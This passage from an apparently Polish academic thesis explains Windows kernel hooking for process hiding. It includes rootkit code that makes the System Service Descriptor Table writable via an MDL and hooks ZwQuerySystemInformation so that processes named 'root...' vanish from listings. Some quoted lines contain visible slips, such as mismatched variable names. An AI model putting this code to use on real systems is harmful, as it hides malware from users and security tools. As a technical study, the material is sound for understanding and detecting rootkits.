Tworzenie punktów zaczepienia ma za zadanie przechwycenie normalnego przepływu wykonania funkcji raportujących (zwracających wybrane informacje, np. EnumProcesses) dostępnych w różnych API systemu operacyjnego i zmodyfikowanie zwracanych przez nie informacji.\\

Punkty zaczepienia w systemach Windows NT dzielą się na dwa podstawowe rodzaje:

\begin{itemize}
	\item punkty zaczepienia w przestrzeni użytkownika dzielą się:
	\begin{itemize}
		\item punkty zaczepienia w tablicy importowanych adresów,
		\item punkty zaczepienia wbudowane w funkcje,
		\item bibliotek DLL wstrzykiwane do procesów,
	\end{itemize}		
	
	\item punkty zaczepienia w jądrze systemu znajdujące się w:
	\begin{itemize}
		\item tablicy deskryptorów usług systemowych,
		\item tablicy deskryptorów przerwań,
		\item głównej tablicy funkcji pakietów żądań wejścia-wyjścia IRP(ang.I/O Request Packet) związanej z obiektem sterownika urządzenia.
	\end{itemize}
	
\end{itemize}

Warto również wspomnieć o połączeniu tych dwóch rodzajów, czyli hybrydowych punktach zaczepienia. \\

Po analizie dostępnych materiałów \cite[p.94-95]{ghoglund06} \cite{spopenko09} można stwierdzić, że do ukrywania procesów możliwe jest wykorzystanie punktów zaczepienia znajdujących się w jądrze systemu, a dokładniej w tabeli deskryptorów usług systemowych. 

\subsubsection{Punkty zaczepienia w jądrze systemu}

Jądro systemu stanowi idealne miejsce do stworzenia punktu zaczepienia. Przemawiają za tym dwa argumenty. Pierwszym z nich jest fakt, że punkty zaczepienia tworzone w jądrze mają charakter globalny. Drugim nie mniej ważnym argumentem jest zwiększenie poziomu ukrycia względem punktów zaczepienia tworzonych w warstwie użytkownika. Wynika to z faktu, że oprogramowanie wykorzystujące punkty zaczepienia działa w pierścieniu zerowym.

\begin{figure}[h!]
	\centering
		\includegraphics[scale=0.7]{img/ring.jpg}
			\caption{Pierścienie ochrony w procesorach z rodziny x86, x64.}\cite{swiatowiak08} 
\end{figure}
\FloatBarrier

Pierścień zerowy jest jednym z czterech pierścieni, które służą do kontroli dostępu w procesorach serii x86. Zerowy pierścień jest najbardziej uprzywilejowany. To w nim uruchamiane są programy działające w warstwie jądra. Pierścień trzeci zaś posiada najmniejsze uprawnienia i w nim uruchamiane są aplikacje w warstwie użytkownika. Pierścień pierwszy i drugi są przez systemy Windows ignorowane.\\ 

Opisana sytuacja daje przewagę twórcy oprogramowania ukrywającego nad aplikacjami wykrywającymi(pierścień trzeci). Dzieje się tak ze względu na posiada większych praw dostępowych w systemie operacyjnym. Świadomy tego faktu twórca może spowodować niepoprawne działanie lub całkowite wyłączenie aplikacji wykrywających, co pozwala na skuteczne maskowanie punktu zaczepienia.

\subsubsection{Punkty zaczepienia w tablicy deskryptorów usług systemowych}

W warstwie jądra działa główna część systemów operacyjnych z rodziny Windows. Część ta udostępnia obsługę wszystkich podsystemów danego systemu operacyjnego. Adresy udostępnianych usług systemowych wpisywane są w tablicę deskryptorów usług systemowych SSDT(ang. System Sevice Descriptor Table)\cite[p. 117-129]{dabak99}. Indeksowanie w tablicy odbywa się za pomocą numerów wywołań systemowych, które pozwalają na odczytanie adresu odpowiedniej funkcji w pamięci. Każdy z adresów ma wielkość czterech bajtów. Kolejną wartą odnotowania strukturą jest tablica parametrów usług systemowych SSPT (ang. System Service Parameter Table). To w niej określona jest ilość bajtów będących parametrami dla poszczególnych funkcji obsługujących wywołania systemowe.\\

Jądro systemowe eksportuje tablicę \textit{KeServiceDescriptorTable}. W ramach tej tablicy zapisany jest wskaźnik na część tablicy SSDT zawierającej najważniejsze usługi systemowe znajdujące się w pliku Ntoskrnl.exe, wskaźnik na tablicę SSPT a także czterobajtowe adresy funkcji eksportowanych przez jądro systemu. \\

Rozdzielanie usług systemowych zaczyna się po wywołaniu instrukcji \textit{SYSENTER} lub przerwania \textit{INT 2E}. Takie wywołanie powoduje przejście procesu do warstwy jądra, wynika to z procedury rozdzielania usług systemowych. Procedura rozdzielania usług systemowych \textit{KiSystemService} może zostać wywołana bezpośrednio przez aplikację lub pośrednio przy pomocy wybranego podsystemu (np. Win32).

W przypadku gdy zostanie zastosowany podsystem, to on wywoła odpowiednie funkcje znajdujące się w bibliotece \textit{Ntdll.dll}. Biblioteka zwróci do rejestru EAX numer identyfikacyjny usługi systemowej. W kolejnym kroku do rejestru EDX ładowane są adresy parametrów funkcji znajdujących się w warstwie użytkownika. \textit{KiSystemService} sprawdza liczbę parametrów i kopiuje je ze stosu użytkownika na stos jądra. W następnej kolejności wywoływana jest funkcja znajdująca się pod adresem pobranym z SSDT indeksowanej identyfikatorem usługi znajdującym się w rejestrze EAX.

W taki sposób po załadowaniu odpowiednio przygotowanej aplikacji powinniśmy otrzymać możliwość modyfikowania tablicy SSDT w taki sposób, aby wskazywała na funkcję z przygotowanej aplikacji, a nie z pliku Ntoskrnl.exe czy Win32k.sys. \\

Od czasu wydania systemu Windows XP tablica SSDT jest dostępna wyłącznie do odczytu. Stało się tak ze względu na praktycznie zerowe prawdopodobieństwo zaistnienia sytuacji, w której niezłośliwe oprogramowanie będzie musiało modyfikować jej zawartość. Ten rodzaj zabezpieczenia jest dosyć poważnym problemem w sytuacji gdy chcemy wykorzystać punkty zaczepienia wstawiane do tej tablicy w celu ukrywanie procesów. Jakakolwiek próba zapisu do zabezpieczonego obszaru pamięci zakończy się zawieszeniem systemu operacyjnego. Istnieje jednak metoda modyfikowanie zabezpieczeń pamięci, korzysta ona z mechanizmów opisanych w dokumentacji przygotowanej przez firmę Microsoft. Jej opis został zaprezentowany poniżej.

\subsubsection{Modyfikacja zabezpieczeń SSDT z wykorzystaniem Memory Descriptor List.}

Pewne regiony pamięci możemy opisać za pomocą listy MDL (ang. Memory Descriptor List). Poniżej przedstawiono strukturę listy MDL w kodzie\cite{amritaluru07}:
\begin{lstlisting}
typedef struct _MDL {
	struct _MDL *Next;
	CSHORT Size;
	CSHORT MdlFlags;
	struct _EPROCESS *Process;
	PVOID MappedSystemVa;
	PVOID StartVa;
	ULONG ByteCount;
	ULONG ByteOffset;
} MDL, *PMDL;
\end{lstlisting}
W ramach tej listy znajdują się następujące informacje o poszczególnych regionach pamięci:
\begin{itemize}
	\item adresy początkowe,
	\item informacje o procesie-właścicielu,
	\item liczba bajtów,
	\item znaczniki.
\end{itemize}

Podczas tworzenia aplikacji omijającej zabezpieczenia tablicy SSDT wymagane jest zmodyfikowanie znaczników pamięci. W tym celu istnieje potrzeba zadeklarowania struktury, która zostanie wykorzystana do rzutowania \textit{KeServiceDescriptorTable} eksportowanej przez jądro systemu. Adres bazowy oraz liczba zapisanych elementów tablicy \textit{KeServiceDescriptorTable} są wykorzystywane podczas wywołania funkcji \textit{MmCreateMdl}. Przy pomocy wcześniej wymienionej funkcji definiowany jest początek oraz rozmiar obszaru pamięci opisywany za pomocą MDL. Jednocześnie twórca aplikacji musi również pamiętać by zbudować listę MDL na podstawie niestronicowanego obszaru pamięci.\\

Kolejnym etapem jest zmiana znaczników w liście MDL w taki sposób, żeby pozwalały one na zapis danych do chronionego obszaru pamięci. Można to zrobić przy pomocy operacji logicznej OR wykonanej na znacznikach oraz wartości MDL\_MAPPED\_TO\_SYSTEM\_VA, która znajduję się w oryginalnej liście MDL. Na koniec strony pamięci opisywane przez MDL blokowane są poprzez funkcję\textit{MmMapLockedPages}.\\

Poniżej przedstawiony jest przykładowy kod\cite[p.98]{ghoglund06}, który umożliwia poprawne wykonanie wcześniej opisanych operacji:
\begin{lstlisting}
typedef struct ServiceDescriptorEntry {
	unsigned int *ServiceTableBase;
	unsigned int *ServiceCounterTableBase;
	unsigned int NumberOfServices;
	unsigned char *ParamTableBase;
} SSDT_Entry;

#pragma pack()
__declspec(dllimport) SSDT_Entry KeServiceDescriptorTable;
PMDL g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
g_pmdlSystemCall = MmCreateMdl(NULL,
			KeServiceDescriptorTable.ServiceTableBase,
			KeServiceDescriptorTable.NumberOfServices*4);
				
if(!g_pmdlSystemCall)
	return STATUS_UNSUCCESSFUL;
	MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
	
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags |
MDL_MAPPED_TO_SYSTEM_VA;

MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
\end{lstlisting}
W przedstawionym powyżej kodzie kluczowy elementami są:
\begin{lstlisting}
PVOID *MappedSystemCallTable;
\end{lstlisting}
zmienna przechowująca adresy z oryginalnej tablicy SSDT,
\begin{lstlisting}
q_pmdlSystemCall = MmCreateMdl(NULL,
			KeServiceDescriptorTable.ServiceTableBase,
			KeServiceDescriptorTable.NumberOfServices*4);
\end{lstlisting}
polecenie odpowiedzialne za odwzorowanie oryginalnej listy MDL na stworzoną przez nas kopię, w celu modyfikacji zabezpieczeń pamięci,\\
\begin{lstlisting}
q_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | 
MDL_MAPPED_TO_SYSTEM_VA;
MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
\end{lstlisting}
polecenie odpowiedzialne za modyfikację znaczników pamięci nowo stworzonej listy MDL.\\

Powyżej przeprowadzone operacje pozwalają na bezpieczny zapis do zabezpieczonego obszaru pamięci. Posiadając tak spreparowaną listę MDL możemy rozpocząć operację związaną z ukrywaniem procesów.

\subsubsection{Ukrywanie procesów z wykorzystaniem SSDT}

W systemach operacyjnych z rodziny Windows NT wykorzystuje się funkcję \textit{ZwQuerySystemInformation} do tworzenia zapytań w celu pozyskania informacji systemowych. Program Task Manager korzysta ze wspomnianej funkcji w celu uzyskania listy procesów działających w systemie. Typ informacji zwracanej przez funkcję zależy od wartości parametru \textit{SystemInformationClass}. Według informacji znajdujących się w dokumentacji Windows Driver Kit, w celu pobrania listy procesów parametr ten musi mieć wartość równą 5. Posiadając te informacje możemy podmienić w tablicy SSDT oryginalną funkcję \textit{ZwQuerySystemInformation} na stworzoną przez funkcje. Wywołanie spreparowanej funkcji pozwoli odpowiednio filtrować nam zwracane wyniki. \\ 

Funkcja \textit{ZwQuerySystemInformation} zwraca informacje o działających procesach w systemie w postaci bufora. Informacje znajdujące się w buforze składają się ze struktur:
\begin{itemize}
 \item \_SYSTEM\_PROCESSES,
 \item \_SYSTEM\_THREADS.
\end{itemize}

Najważniejszym elementem struktury \_SYSTEM\_PROCESSES jest nazwa procesu zapisana w polu o typie UNICODE\_STRING. W ramach struktury istnieją również dwa pola typu LARGE\_INTEGER. W polach tych wpisywane są czasy jakie proces spędził w trybie użytkownika oraz trybie jądra. Podczas ukrywania procesu tworzona aplikacja musi dodać czasy wykonania tego procesu do czasów innego procesu z listy, tak aby suma czasów działania wszystkich procesów była taka sama jak całkowity czas procesora.

Poniżej przedstawiono format struktur procesów oraz wątków zapisanych w buforze zwracanym przez \textit{ZwQuerySystemInformation}:
\begin{lstlisting}
struct _SYSTEM_PROCESSES
{
	ULONG 			NextEntryDelta;
	ULONG	 		ThreadCount;
	ULONG 			Reserved[6];
	LARGE_INTEGER 	CreateTime;
	LARGE_INTEGER 	UserTime;
	LARGE_INTEGER 	KernelTime;
	UNICODE_STRING 	ProcessName;
	KPRIORITY 		BasePriority;
	ULONG 			ProcessId;
	ULONG 			InheritedFromProcessId;
	ULONG			HandleCount;
	ULONG 			Reserved2[2];
	VM_COUNTERS 	VmCounters;
	struct _SYSTEM_THREADS Threads[1];
};

struct _SYSTEM_THREADS
{
	LARGE_INTEGER 	KernelTime;
	LARGE_INTEGER 	UserTime;
	LARGE_INTEGER 	CreateTime;
	ULONG 			WaitTime;
	PVOID 			StartAddress;
	CLIENT_ID 		ClientIs;
	KPRIORITY 		Priority;
	KPRIORITY 		BasePriority;
	ULONG 			ContextSwitchCount;
	ULONG 			ThreadState;
	KWAIT_REASON 	WaitReason;
};
\end{lstlisting}

Posiadając już informacje na temat powyżej przedstawionych struktur możemy przejść do zainstalowania punktu zaczepienia w tablicy SSDT. W tym celu stworzona zostanie nowa funkcja imitująca działanie ZwQuerySystemInformation.  
Wspomniana funkcja w wyniku poprawnego działania zwraca dwukierunkową listę procesów. Spreparowana funkcja będzie imitować jej działanie, jednocześnie usuwając procesy zaczynające się od wskazanego ciągu znaków np. ,,root''. Poniżej przedstawiono przykładowy kod takiej funkcji\cite[p.101-102]{ghoglund06}:
\begin{lstlisting}
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;	
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))
(SystemInformationClass,SystemInformation,
SystemInformationLength,ReturnLength);
if( NT_SUCCESS(ntStatus))
{	
// Prosba o liste plikow i katalogow
if(SystemInformationClass == 5)
{
// Zapytanie o liste procesow 
// Wyszukanie procesow o nazwach zaczynajacych 
// sie od "root" i usuniecie ich z listy
struct _SYSTEM_PROCESSES *curr =(struct _SYSTEM_PROCESSES *) SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{		
if (curr->ProcessName.Buffer != NULL)
{
if(0 == memcmp(curr->ProcessName.Buffer, L"root", 12))
{
m_UserTime.QuadPart += curr->UserTime.QuadPart;
m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
if(prev)
{
if(curr->NextEntryDelta)
prev->NextEntryDelta +=curr->NextEntryDelta;
else
prev->NextEntryDelta = 0;
}
else
{
if(curr->NextEntryDelta)
{
(char*)SystemInformation +=curr->NextEntryDelta;
}
else
SystemInformation = NULL;
}
}
}
else 
{
curr->UserTime.QuadPart += m_UserTime.QuadPart;
curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
prev = curr;
if(curr->NextEntryDelta)((char*)curr+=curr->NextEntryDelta);
else curr = NULL;
}
}		
else if (SystemInformationClass == 8)
{
struct _SYSTEM_PROCESSOR_TIMES * times 
=(struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;

times->IdleTime.QuadPart += 
m_UserTime.QuadPart +m_KernelTime.QuadPart;
}
}
return ntStatus;
}
\end{lstlisting}

Informacje przedstawione w powyższych punktach powinny umożliwić skuteczne ukrywanie procesów z wykorzystaniem punktów zaczepienia. W następnym podrozdziale przedstawione zostanie inne podejście do zadania związanego z ukrywaniem procesów.